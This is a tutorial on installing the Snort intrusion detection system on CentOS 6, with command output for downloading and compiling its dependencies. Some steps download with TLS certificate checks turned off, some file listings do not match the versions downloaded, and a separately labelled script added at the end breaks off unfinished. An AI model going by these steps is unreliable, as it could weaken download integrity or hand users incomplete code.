Snort(Sniffer and More)

NIDS on CentOS 6.4/6.5






■ Firewall vs IDS (Intrusion Detection System) vs IPS (Intrusion Prevention System)


Item                           IPS (Intrusion Prevention)          IDS (Intrusion Detection)                 F/W (Firewall)
-----------------------------  ----------------------------------  ----------------------------------------  --------------------------------------
Connection method              In-line                             Mirror (TAP, switch mirror port)          In-line
Blocking method                Itself                              TCP reset signal, firewall integration    Itself
One-way attack                 Detect / block                      Detect                                    Not possible
DoS & DDoS                     Detect / block                      Detect                                    Partial support
Recovery on service outage     Through a FOD (fail-over device)    Not applicable (out of band)              HA, fail-over
Real-time session monitoring   Supported                           Supported                                 Supported
Worm virus                     Detect / block                      Detect                                    Not possible
NAT                            Not supported                       Not supported                             Supported
Multiple ports                 2 segments                          8 segments                                Additional NIC connections supported

Strengths
- IPS : its own detection and blocking modules inspect every packet, so the network is protected in place.
- IDS : its own detection module inspects every packet and raises alerts on anomalous network activity.
- F/W : access policies for services and objects can be specified in detail, so unnecessary services can be restricted.

Weaknesses
- IPS : no NAT or other firewall-native functions, so it is limited when building a private network.
- IDS : blocking only works through firewall integration (independent blocking is limited).
- F/W : cannot detect complex, sophisticated attacks beyond what IP addresses and ports reveal.






■ IDS (Intrusion Detection System)

Network defense or "protection" model
- Planning   : policy, rule
- Prevention : IPS
- Detection  : IDS
- Response   : email, alert, terminate session, report

Intrusion detection is the process of discovering, analyzing, and reporting unauthorized or damaging network or computer activities.



■ IDS (Intrusion Detection System) types

N-IDS (Network-based IDS)
Network traffic is monitored by network-based intrusion detection systems.
-> Open source :
Snort

H-IDS (Host-based IDS)
Computer processes and files are monitored by host-based intrusion detection systems.
-> Open source :
Tripwire



■ Introduction to Snort (sniffer and more)


Snort is a Network Intrusion Detection System (NIDS). It can sniff your network and alert you, based on its rule database, when there is an attack on your network or hosts. It is an open-source system built on libpcap, the packet capture library that tcpdump (the Linux sniffer tool) also uses.


Snort : an open-source network intrusion prevention and detection system. It uses a rule-based language combining signature, protocol and anomaly inspection methods.


Snort : the most widely deployed intrusion detection and prevention technology; it has become the de facto industry standard worldwide.


Packet sniffer : capture and display packets from the network on the console, with selectable levels of detail.

Packet logger : log packet data to files on disk.

Honeypot monitor : watch traffic to a decoy host that deceives hostile parties.

NIDS : a fast, flexible, small-footprint, open-source NIDS developed by the security community.

Lead coder : Marty Roesch, founder of Sourcefire (www.sourcefire.com; acquired by Cisco in 2013).

Initially developed in late 1998 as a sniffer with consistent output, unlike the protocol-dependent output of tcpdump.









■ System used

- CentOS 6.X (6.4 or 6.5)



1. Snort Installation


        ■ INDEX

        ---------------------------

        ■ Check system information

        ■ Download the snort-related packages

        ■ Download the snort rules

        ■ Compile the snort-related packages

        ---------------------------


(1) Check system information

# uname -a

Linux ids.example.com 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux


# cat /etc/redhat-release

CentOS release 6.4 (Final)


# cat /proc/cpuinfo

processor       : 0

vendor_id       : AuthenticAMD

cpu family      : 21

model           : 2

model name      : AMD FX(tm)-6300 Six-Core Processor            

stepping : 0

cpu MHz         : 3507.009

cache size      : 2048 KB

physical id      : 0

siblings : 6

core id         : 0

cpu cores       : 6

apicid          : 0

initial apicid   : 0

fpu             : yes

fpu_exception    : yes

cpuid level      : 13

wp              : yes

flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good tsc_reliable nonstop_tsc aperfmperf unfair_spinlock pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic popcnt aes xsave avx f16c hypervisor lahf_lm cmp_legacy extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw xop fma4 tbm bmi1

..... (omitted) .....


# top -n 1 | egrep '(Mem:|Swap:)'   (# free)

Mem:   881476k total,   553036k used,   328440k free,    23504k buffers

Swap:  4095992k total,        0k used,  4095992k free,   227476k cached


# df -h    (# df -h -T)

Filesystem            Size  Used Avail Use% Mounted on

/dev/mapper/vg_ids-lv_root

                       36G  3.8G   30G  12% /

tmpfs                 431M  224K  431M   1% /dev/shm

/dev/sda1             485M   38M  423M   9% /boot

-> The disk is laid out with LVM (Logical Volume Manager).



# ifconfig    (# ip addr)

eth0      Link encap:Ethernet  HWaddr 00:0C:29:45:A1:D8 

          inet addr:192.168.20.203  Bcast:192.168.20.255  Mask:255.255.255.0

          inet6 addr: fe80::20c:29ff:fe45:a1d8/64 Scope:Link

          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

          RX packets:32 errors:0 dropped:0 overruns:0 frame:0

          TX packets:17 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:1000

          RX bytes:11468 (11.1 KiB)  TX bytes:1251 (1.2 KiB)

 

eth1      Link encap:Ethernet  HWaddr 00:0C:29:45:A1:E2 

          inet addr:192.168.10.203  Bcast:192.168.10.255  Mask:255.255.255.0

          inet6 addr: fe80::20c:29ff:fe45:a1e2/64 Scope:Link

          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

          RX packets:19 errors:0 dropped:0 overruns:0 frame:0

          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:1000

          RX bytes:2006 (1.9 KiB)  TX bytes:468 (468.0 b)

 

lo        Link encap:Local Loopback 

          inet addr:127.0.0.1  Mask:255.0.0.0

          inet6 addr: ::1/128 Scope:Host

          UP LOOPBACK RUNNING  MTU:16436  Metric:1

          RX packets:16 errors:0 dropped:0 overruns:0 frame:0

          TX packets:16 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:0

          RX bytes:960 (960.0 b)  TX bytes:960 (960.0 b)





(2) Download the snort-related packages


■ Download package list


====================Example=====================================

snort-2.9.7.0.tar.gz     www.snort.org (get the latest version)

daq-2.0.4.tar.gz         www.snort.org (get the latest version)

libpcap-1.6.2.tar.gz     www.tcpdump.org (get the latest version)

pcre-8.36.tar.bz2        www.pcre.org (get the latest version)

libdnet-1.12.tgz         code.google.com/p/libdnet

================================================================


① Create the package download directory

# mkdir /snort && cd /snort


② Download the snort and daq packages

Go to http://www.snort.org and check the latest release.


        ■ 2015-05-26 : daq-2.0.5.tar.gz / snort-2.9.7.3.tar.gz

        ■ 2015-09-08 : daq-2.0.6.tar.gz / snort-2.9.7.5.tar.gz

        ■ 2016-01-06 : daq-2.0.6.tar.gz / snort-2.9.8.0.tar.gz

        ■ 2016-05-31 : daq-2.0.6.tar.gz / snort-2.9.8.2.tar.gz

        ■ 2016-08-02 : daq-2.0.6.tar.gz / snort-2.9.8.3.tar.gz


# wget https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

--2014-12-11 16:31:46--  https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

Resolving www.snort.org... 104.28.25.35, 104.28.24.35, 2400:cb00:2048:1::681c:1823, ...

Connecting to www.snort.org|104.28.25.35|:443... connected.

ERROR: certificate common name “ssl2000.cloudflare.com” doesn’t match requested host name “www.snort.org”.

To connect to www.snort.org insecurely, use ‘--no-check-certificate’.


(Note) The mismatch is a client-side limitation: the wget shipped with CentOS 6 (1.12) does not send SNI, so it is handed Cloudflare's shared certificate instead of the one for www.snort.org. Passing --no-check-certificate makes the download go through, but it also removes the only authenticity check on the transfer, so verify what you downloaded (file type, and a checksum obtained from a trusted channel) before you build it.


# wget --no-check-certificate https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

--2014-12-11 16:33:44--  https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

Resolving www.snort.org... 104.28.24.35, 104.28.25.35, 2400:cb00:2048:1::681c:1923, ...

Connecting to www.snort.org|104.28.24.35|:443... connected.

WARNING: certificate common name “ssl2000.cloudflare.com” doesn’t match requested host name “www.snort.org”.

HTTP request sent, awaiting response... 302 Found

Location: https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/830/original/daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418286827&Signature=%2F9yiNQ2GbvnONASKekS4tbVQePM%3D [following]

--2014-12-11 16:33:46--  https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/830/original/daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418286827&Signature=%2F9yiNQ2GbvnONASKekS4tbVQePM%3D

Resolving s3.amazonaws.com... 54.231.244.8

Connecting to s3.amazonaws.com|54.231.244.8|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 495316 (484K) [,binary/octet-stream]

Saving to: “daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418286827&Signature=%2F9yiNQ2GbvnONASKekS4tbVQePM=”

 

100%[=========================================>] 495,316      136K/s   in 3.6s   

 

2014-12-11 16:33:50 (136 KB/s) - “daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418286827&Signature=%2F9yiNQ2GbvnONASKekS4tbVQePM=” saved [495316/495316]


# ls

daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418286827&Signature=%2F9yiNQ2GbvnONASKekS4tbVQePM=


# rm -rf daq*

#


# wget --no-check-certificate https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz \

-O daq-2.0.4.tar.gz


--2014-12-11 16:37:48--  https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

Resolving www.snort.org... 104.28.24.35, 104.28.25.35, 2400:cb00:2048:1::681c:1923, ...

Connecting to www.snort.org|104.28.24.35|:443... connected.

WARNING: certificate common name “ssl2000.cloudflare.com” doesn’t match requested host name “www.snort.org”.

HTTP request sent, awaiting response... 302 Found

Location: https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/830/original/daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418287071&Signature=6baO407gh69zPNZDgydKaYKn7p8%3D [following]

--2014-12-11 16:37:49--  https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/830/original/daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418287071&Signature=6baO407gh69zPNZDgydKaYKn7p8%3D

Resolving s3.amazonaws.com... 54.231.244.0

Connecting to s3.amazonaws.com|54.231.244.0|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 495316 (484K) [,binary/octet-stream]

Saving to: “daq-2.0.4.tar.gz”

 

100%[=========================================>] 495,316      110K/s   in 4.4s   

 

2014-12-11 16:37:56 (110 KB/s) - “daq-2.0.4.tar.gz” saved [495316/495316]





# wget --no-check-certificate https://www.snort.org/downloads/snort/snort-2.9.7.0.tar.gz \

-O snort-2.9.7.0.tar.gz

--2014-12-11 16:40:11--  https://www.snort.org/downloads/snort/snort-2.9.7.0.tar.gz

Resolving www.snort.org... 104.28.24.35, 104.28.25.35, 2400:cb00:2048:1::681c:1923, ...

Connecting to www.snort.org|104.28.24.35|:443... connected.

WARNING: certificate common name “ssl2000.cloudflare.com” doesn’t match requested host name “www.snort.org”.

HTTP request sent, awaiting response... 302 Found

Location: https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/819/original/snort-2.9.7.0.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418287214&Signature=20oRt6vZbNqfINNT8llYTTq3%2Bxc%3D [following]

--2014-12-11 16:40:12--  https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/819/original/snort-2.9.7.0.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418287214&Signature=20oRt6vZbNqfINNT8llYTTq3%2Bxc%3D

Resolving s3.amazonaws.com... 54.231.244.0

Connecting to s3.amazonaws.com|54.231.244.0|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 6340553 (6.0M) [,binary/octet-stream]

Saving to: “snort-2.9.7.0.tar.gz”

 

100%[=========================================>] 6,340,553    254K/s   in 18s    

 

2014-12-11 16:40:31 (340 KB/s) - “snort-2.9.7.0.tar.gz” saved [6340553/6340553]


③ Download the libpcap package

Go to http://www.tcpdump.org and download the latest package.


        ■ 2015-05-26 : libpcap-1.7.3.tar.gz

        ■ 2015-09-08 : libpcap-1.7.4.tar.gz

        ■ 2016-01-06 : libpcap-1.7.4.tar.gz

        ■ 2016-05-31 : libpcap-1.7.4.tar.gz


# wget http://www.tcpdump.org/release/libpcap-1.6.2.tar.gz

--2014-12-11 16:45:01--  http://www.tcpdump.org/release/libpcap-1.6.2.tar.gz

Resolving www.tcpdump.org... 192.139.46.66, 69.4.231.52, 132.213.238.6, ...

Connecting to www.tcpdump.org|192.139.46.66|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 651237 (636K) [application/x-gzip]

Saving to: “libpcap-1.6.2.tar.gz”

 

100%[=========================================>] 651,237     28.9K/s   in 15s    

 

2014-12-11 16:45:16 (43.6 KB/s) - “libpcap-1.6.2.tar.gz” saved [651237/651237]


④ Download the pcre package

Go to http://sourceforge.net/projects/pcre/files/pcre and download the latest package.


        ■ 2015-05-26 : pcre-8.37.tar.gz

        ■ 2015-09-08 : pcre-8.37.tar.gz

        ■ 2016-01-06 : pcre-8.37.tar.gz

        ■ 2016-05-31 : pcre-8.38.tar.gz


# wget http://sourceforge.net/projects/pcre/files/pcre/8.36/pcre-8.36.tar.gz/download

--2014-12-11 16:48:25--  http://sourceforge.net/projects/pcre/files/pcre/8.36/pcre-8.36.tar.gz/download

Resolving sourceforge.net... 216.34.181.60

Connecting to sourceforge.net|216.34.181.60|:80... connected.

HTTP request sent, awaiting response... 302 Found

Location: http://downloads.sourceforge.net/project/pcre/pcre/8.36/pcre-8.36.tar.gz?r=&ts=1418284108&use_mirror=jaist [following]

--2014-12-11 16:48:26--  http://downloads.sourceforge.net/project/pcre/pcre/8.36/pcre-8.36.tar.gz?r=&ts=1418284108&use_mirror=jaist

Resolving downloads.sourceforge.net... 216.34.181.59

Connecting to downloads.sourceforge.net|216.34.181.59|:80... connected.

HTTP request sent, awaiting response... 302 Found

Location: http://jaist.dl.sourceforge.net/project/pcre/pcre/8.36/pcre-8.36.tar.gz [following]

--2014-12-11 16:48:27--  http://jaist.dl.sourceforge.net/project/pcre/pcre/8.36/pcre-8.36.tar.gz

Resolving jaist.dl.sourceforge.net... 150.65.7.130, 2001:df0:2ed:feed::feed

Connecting to jaist.dl.sourceforge.net|150.65.7.130|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 2009464 (1.9M) [application/x-gzip]

Saving to: “pcre-8.36.tar.gz.1”

 

100%[=========================================>] 2,009,464    502K/s   in 3.9s   

 

2014-12-11 16:48:31 (502 KB/s) - “pcre-8.36.tar.gz.1” saved [2009464/2009464]


⑤ Download the libdnet package

Go to https://code.google.com/p/libdnet/ and download the latest package (the command below fetches the same release from the project's GitHub archive).


        ■ 2015-05-26 : libdnet-1.12.tgz

        ■ 2015-09-08 : libdnet-1.12.tgz

        ■ 2016-01-06 : libdnet-1.12.tar.gz

        ■ 2016-05-31 : libdnet-1.12.tar.gz


# cd /snort

# wget https://github.com/dugsong/libdnet/archive/libdnet-1.12.tar.gz -O libdnet-1.12.tar.gz

--2016-01-06 22:15:11--  https://github.com/dugsong/libdnet/archive/libdnet-1.12.tar.gz

Resolving github.com... 192.30.252.130

Connecting to github.com|192.30.252.130|:443... connected.

HTTP request sent, awaiting response... 302 Found

Location: https://codeload.github.com/dugsong/libdnet/tar.gz/libdnet-1.12 [following]

--2016-01-06 22:15:12--  https://codeload.github.com/dugsong/libdnet/tar.gz/libdnet-1.12

Resolving codeload.github.com... 192.30.252.147

Connecting to codeload.github.com|192.30.252.147|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 959945 (937K) [application/x-gzip]

Saving to: `libdnet-1.12'

 

100%[=================================================>] 959,945      295K/s   in 3.2s   

 

2016-01-06 22:15:16 (295 KB/s) - `libdnet-1.12' saved [959945/959945]


# ls

daq-2.0.6.tar.gz    libpcap-1.7.4.tar.gz  snort-2.9.8.0.tar.gz

libdnet-master.zip  pcre-8.37.tar.gz







(3) Download the snort rules


==================================================

oinkmaster-1.2.0.rpm             www.rpmfind.net / rpm.pbone.net

snortrules-snapshot-2956.tar.gz  www.snort.org

==================================================



■ Download oinkmaster (the lab uses the rpm file)

(source code)

# wget http://sourceforge.net/projects/oinkmaster/files/oinkmaster/1.2/oinkmaster-1.2.tar.gz/download


or


(rpm file)

# wget ftp://ftp.pbone.net/mirror/ftp.sourceforge.net/pub/sourceforge/s/sn/snortsas/oinkmaster-1.2-0.noarch.rpm




■ Download the snortrules file

(Caution) You must register a free account at www.snort.org first; the registered rule snapshot is only served to logged-in users.


        ■ 2015-05-26 : snortrules-snapshot-2973.tar.gz

        ■ 2015-09-08 : snortrules-snapshot-2975.tar.gz

        ■ 2016-01-06 : snortrules-snapshot-2980.tar.gz

        ■ 2016-05-31 : snortrules-snapshot-2982.tar.gz


# wget --no-check-certificate \

https://www.snort.org/downloads/registered/snortrules-snapshot-2970.tar.gz \

-O snortrules-snapshot-2970.tar.gz


# ls

daq-2.0.4.tar.gz     oinkmaster-1.2.tar.gz  snortrules-snapshot-2970.tar.gz

libdnet-1.12.tgz      pcre-8.36.tar.gz

libpcap-1.6.2.tar.gz  snort-2.9.7.0.tar.gz

-> (Caution) Always check the snortrules-snapshot-*.tar.gz file with the file command.

          If it is reported as anything other than gzip data (HTML document text), the server returned a login or error
          page instead of the archive; download it through a browser while logged in and copy it to the server.

        (wrong)

         # file snortrules-snapshot-*.tar.gz

        snortrules-snapshot-2975.tar.gz: HTML document text

        (correct)

        # file snortrules-snapshot-*.tar.gz

        snortrules-snapshot-2980.tar.gz: gzip compressed data, from Unix, last modified:....


(4) Compile the packages


■ Package installation order

==============Example==========

oinkmaster-1.2.tar.gz

snortrules-snapshot-2970.tar.gz

libpcap-1.6.2.tar.gz

pcre-8.36.tar.gz

libdnet-1.12.tgz

daq-2.0.4.tar.gz

snort-2.9.7.0.tar.gz

===============================



■ How to compile a package

====================

# tar xvzf <PKG>

# cd <PKG>

# ./configure

# make

# make install

====================


[Note] configure / make / make install



① Install the prerequisite packages

# yum -y install gcc flex bison zlib zlib-devel gcc-c++

Loaded plugins: fastestmirror, refresh-packagekit, security

Loading mirror speeds from cached hostfile

 * base: ftp.kaist.ac.kr

 * extras: ftp.kaist.ac.kr

 * updates: ftp.kaist.ac.kr

base                                                        | 3.7 kB     00:00    

extras                                                      | 3.4 kB     00:00    

updates                                                     | 3.4 kB     00:00    

Setting up Install Process

Package zlib-1.2.3-29.el6.x86_64 already installed and latest version

Resolving Dependencies

--> Running transaction check

---> Package bison.x86_64 0:2.4.1-5.el6 will be installed

---> Package flex.x86_64 0:2.5.35-9.el6 will be installed

---> Package gcc.x86_64 0:4.4.7-11.el6 will be installed

--> Processing Dependency: libgomp = 4.4.7-11.el6 for package: gcc-4.4.7-11.el6.x86_64

--> Processing Dependency: cpp = 4.4.7-11.el6 for package: gcc-4.4.7-11.el6.x86_64

--> Processing Dependency: libgcc >= 4.4.7-11.el6 for package: gcc-4.4.7-11.el6.x86_64

--> Processing Dependency: glibc-devel >= 2.2.90-12 for package: gcc-4.4.7-11.el6.x86_64

--> Processing Dependency: cloog-ppl >= 0.15 for package: gcc-4.4.7-11.el6.x86_64

---> Package zlib-devel.x86_64 0:1.2.3-29.el6 will be installed

--> Running transaction check

---> Package cloog-ppl.x86_64 0:0.15.7-1.2.el6 will be installed

--> Processing Dependency: libppl_c.so.2()(64bit) for package: cloog-ppl-0.15.7-1.2.el6.x86_64

--> Processing Dependency: libppl.so.7()(64bit) for package: cloog-ppl-0.15.7-1.2.el6.x86_64

---> Package cpp.x86_64 0:4.4.7-11.el6 will be installed

--> Processing Dependency: libmpfr.so.1()(64bit) for package: cpp-4.4.7-11.el6.x86_64

---> Package glibc-devel.x86_64 0:2.12-1.149.el6 will be installed

--> Processing Dependency: glibc-headers = 2.12-1.149.el6 for package: glibc-devel-2.12-1.149.el6.x86_64

--> Processing Dependency: glibc = 2.12-1.149.el6 for package: glibc-devel-2.12-1.149.el6.x86_64

--> Processing Dependency: glibc-headers for package: glibc-devel-2.12-1.149.el6.x86_64

---> Package libgcc.x86_64 0:4.4.7-3.el6 will be updated

---> Package libgcc.x86_64 0:4.4.7-11.el6 will be an update

---> Package libgomp.x86_64 0:4.4.7-3.el6 will be updated

---> Package libgomp.x86_64 0:4.4.7-11.el6 will be an update

--> Running transaction check

---> Package glibc.x86_64 0:2.12-1.107.el6 will be updated

--> Processing Dependency: glibc = 2.12-1.107.el6 for package: glibc-common-2.12-1.107.el6.x86_64

---> Package glibc.x86_64 0:2.12-1.149.el6 will be an update

---> Package glibc-headers.x86_64 0:2.12-1.149.el6 will be installed

--> Processing Dependency: kernel-headers >= 2.2.1 for package: glibc-headers-2.12-1.149.el6.x86_64

--> Processing Dependency: kernel-headers for package: glibc-headers-2.12-1.149.el6.x86_64

---> Package mpfr.x86_64 0:2.4.1-6.el6 will be installed

---> Package ppl.x86_64 0:0.10.2-11.el6 will be installed

--> Running transaction check

---> Package glibc-common.x86_64 0:2.12-1.107.el6 will be updated

---> Package glibc-common.x86_64 0:2.12-1.149.el6 will be an update

---> Package kernel-headers.x86_64 0:2.6.32-504.1.3.el6 will be installed

--> Finished Dependency Resolution

 

Dependencies Resolved

 

===================================================================================

 Package              Arch         Version                     Repository     Size

===================================================================================

Installing:

 bison                x86_64       2.4.1-5.el6                 base          637 k

 flex                 x86_64       2.5.35-9.el6                base          285 k

 gcc                  x86_64       4.4.7-11.el6                base           10 M

 zlib-devel           x86_64       1.2.3-29.el6                base           44 k

Installing for dependencies:

 cloog-ppl            x86_64       0.15.7-1.2.el6              base           93 k

 cpp                  x86_64       4.4.7-11.el6                base          3.7 M

 glibc-devel          x86_64       2.12-1.149.el6              base          983 k

 glibc-headers        x86_64       2.12-1.149.el6              base          611 k

 kernel-headers       x86_64       2.6.32-504.1.3.el6          updates       3.3 M

 mpfr                 x86_64       2.4.1-6.el6                 base          157 k

 ppl                  x86_64       0.10.2-11.el6               base          1.3 M

Updating for dependencies:

 glibc                x86_64       2.12-1.149.el6              base          3.8 M

 glibc-common         x86_64       2.12-1.149.el6              base           14 M

 libgcc               x86_64       4.4.7-11.el6                base          102 k

 libgomp              x86_64       4.4.7-11.el6                base          133 k

 

Transaction Summary

===================================================================================

Install      11 Package(s)

Upgrade       4 Package(s)

 

Total download size: 39 M

Downloading Packages:

(1/15): bison-2.4.1-5.el6.x86_64.rpm                        | 637 kB     00:01    

(2/15): cloog-ppl-0.15.7-1.2.el6.x86_64.rpm                 |  93 kB     00:00    

(3/15): cpp-4.4.7-11.el6.x86_64.rpm                         | 3.7 MB     00:09    

(4/15): flex-2.5.35-9.el6.x86_64.rpm                        | 285 kB     00:00    

(5/15): gcc-4.4.7-11.el6.x86_64.rpm                         |  10 MB     00:10    

(6/15): glibc-2.12-1.149.el6.x86_64.rpm                     | 3.8 MB     00:03    

(7/15): glibc-common-2.12-1.149.el6.x86_64.rpm              |  14 MB     00:09    

(8/15): glibc-devel-2.12-1.149.el6.x86_64.rpm               | 983 kB     00:00    

(9/15): glibc-headers-2.12-1.149.el6.x86_64.rpm             | 611 kB     00:00    

(10/15): kernel-headers-2.6.32-504.1.3.el6.x86_64.rpm       | 3.3 MB     00:03    

(11/15): libgcc-4.4.7-11.el6.x86_64.rpm                     | 102 kB     00:00    

(12/15): libgomp-4.4.7-11.el6.x86_64.rpm                    | 133 kB     00:00    

(13/15): mpfr-2.4.1-6.el6.x86_64.rpm                        | 157 kB     00:00    

(14/15): ppl-0.10.2-11.el6.x86_64.rpm                       | 1.3 MB     00:01    

(15/15): zlib-devel-1.2.3-29.el6.x86_64.rpm                 |  44 kB     00:00    

-----------------------------------------------------------------------------------

Total                                              962 kB/s |  39 MB     00:41    

warning: rpmts_HdrFromFdno: Header V3 RSA/SHA1 Signature, key ID c105b9de: NOKEY

Retrieving key from file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6

Importing GPG key 0xC105B9DE:

 Userid : CentOS-6 Key (CentOS 6 Official Signing Key) <centos-6-key@centos.org>

 Package: centos-release-6-4.el6.centos.10.x86_64 (@anaconda-CentOS-201303020151.x86_64/6.4)

 From   : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6

Running rpm_check_debug

Running Transaction Test

Transaction Test Succeeded

Running Transaction

  Updating   : libgcc-4.4.7-11.el6.x86_64                                     1/19

  Updating   : glibc-2.12-1.149.el6.x86_64                                    2/19

  Updating   : glibc-common-2.12-1.149.el6.x86_64                             3/19

  Updating   : libgomp-4.4.7-11.el6.x86_64                                    4/19

  Installing : mpfr-2.4.1-6.el6.x86_64                                        5/19

  Installing : cpp-4.4.7-11.el6.x86_64                                        6/19

  Installing : ppl-0.10.2-11.el6.x86_64                                       7/19

  Installing : cloog-ppl-0.15.7-1.2.el6.x86_64                                8/19

  Installing : kernel-headers-2.6.32-504.1.3.el6.x86_64                       9/19

  Installing : glibc-headers-2.12-1.149.el6.x86_64                           10/19

  Installing : glibc-devel-2.12-1.149.el6.x86_64                             11/19

  Installing : gcc-4.4.7-11.el6.x86_64                                       12/19

  Installing : bison-2.4.1-5.el6.x86_64                                      13/19

  Installing : flex-2.5.35-9.el6.x86_64                                      14/19

  Installing : zlib-devel-1.2.3-29.el6.x86_64                                15/19

  Cleanup    : libgomp-4.4.7-3.el6.x86_64                                    16/19

  Cleanup    : glibc-2.12-1.107.el6.x86_64                                   17/19

  Cleanup    : glibc-common-2.12-1.107.el6.x86_64                            18/19

  Cleanup    : libgcc-4.4.7-3.el6.x86_64                                     19/19

  Verifying  : glibc-common-2.12-1.149.el6.x86_64                             1/19

  Verifying  : gcc-4.4.7-11.el6.x86_64                                        2/19

  Verifying  : glibc-2.12-1.149.el6.x86_64                                    3/19

  Verifying  : bison-2.4.1-5.el6.x86_64                                       4/19

  Verifying  : glibc-headers-2.12-1.149.el6.x86_64                            5/19

  Verifying  : glibc-devel-2.12-1.149.el6.x86_64                              6/19

  Verifying  : libgcc-4.4.7-11.el6.x86_64                                     7/19

  Verifying  : libgomp-4.4.7-11.el6.x86_64                                    8/19

  Verifying  : flex-2.5.35-9.el6.x86_64                                       9/19

  Verifying  : mpfr-2.4.1-6.el6.x86_64                                       10/19

  Verifying  : kernel-headers-2.6.32-504.1.3.el6.x86_64                      11/19

  Verifying  : zlib-devel-1.2.3-29.el6.x86_64                                12/19

  Verifying  : cpp-4.4.7-11.el6.x86_64                                       13/19

  Verifying  : ppl-0.10.2-11.el6.x86_64                                      14/19

  Verifying  : cloog-ppl-0.15.7-1.2.el6.x86_64                               15/19

  Verifying  : glibc-2.12-1.107.el6.x86_64                                   16/19

  Verifying  : glibc-common-2.12-1.107.el6.x86_64                            17/19

  Verifying  : libgomp-4.4.7-3.el6.x86_64                                    18/19

  Verifying  : libgcc-4.4.7-3.el6.x86_64                                     19/19

 

Installed:

  bison.x86_64 0:2.4.1-5.el6            flex.x86_64 0:2.5.35-9.el6                

  gcc.x86_64 0:4.4.7-11.el6             zlib-devel.x86_64 0:1.2.3-29.el6          

 

Dependency Installed:

  cloog-ppl.x86_64 0:0.15.7-1.2.el6          cpp.x86_64 0:4.4.7-11.el6           

  glibc-devel.x86_64 0:2.12-1.149.el6        glibc-headers.x86_64 0:2.12-1.149.el6

  kernel-headers.x86_64 0:2.6.32-504.1.3.el6 mpfr.x86_64 0:2.4.1-6.el6           

  ppl.x86_64 0:0.10.2-11.el6               

 

Dependency Updated:

  glibc.x86_64 0:2.12-1.149.el6        glibc-common.x86_64 0:2.12-1.149.el6      

  libgcc.x86_64 0:4.4.7-11.el6         libgomp.x86_64 0:4.4.7-11.el6             

 

Complete!




(4-1) Install the oinkmaster package

# cd /snort

# tar xvzf oinkmaster-1.2.tar.gz



(4-2) Stage the snortrules archive (it is unpacked into /etc/snort in section 2)

# mkdir snortrules

# mv snortrules-snapshot-2970.tar.gz snortrules

# ls snortrules


(4-3) Compile & install libpcap

# tar xvzf libpcap*.tar.gz

# cd libpcap-1.6.2

# ./configure

# make

# make install


        [Note] # ./configure --help

        [Note] # ./configure > /tmp/libpcap.config 2>&1

        [Note] # ./configure && make && make install

        [Note] # time ./configure

        [Note] # ./configure ; echo $?



(4-4) Compile & install pcre


        a.tar.gz : # tar xvzf a.tar.gz  (# gunzip a.tar.gz  ; # tar xvf a.tar)

        a.tar.bz2: # tar xvjf a.tar.bz2 (# bunzip2 a.tar.bz2; # tar xvf a.tar)


# cd /snort

# tar xvzf pcre-8.36.tar.gz

# cd pcre-8.36

# ./configure

# make

# make install


(4-5) Compile & install libdnet

# cd /snort

# tar xvzf libdnet-1.12.tar.gz

# cd libdnet-1.12

# ./configure

# make

# make install


(4-6) Compile & install daq

# cd /snort

# tar xvzf daq-2.0.4.tar.gz

# cd daq-2.0.4

# ./configure

# make

# make install


(4-7) Compile & install snort

# cd /snort

# tar xvzf snort-2.9.7.0.tar.gz

# cd snort-2.9.7.0

# ./configure    (Caution) for snort 2.9.7.5 and later: ./configure --enable-sourcefire

# make

# make install
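The two download caveats above (the --no-check-certificate workaround in step (2) and the HTML-instead-of-gzip check in step (3)) and the configure / make / make install sequence of (4-3) to (4-7) can be folded into one script. The following is an added example and not code from the original post: it refuses any tarball that is not gzip data or whose SHA-256 does not match a value recorded from a trusted channel, and only then runs the build sequence. The fixture files, the hash handling and the build_pkg helper are the example's own; the expected hash in the commented call is a placeholder you must replace.

```shell
#!/bin/sh
# Added example, not from the original post. Gate each source tarball on two
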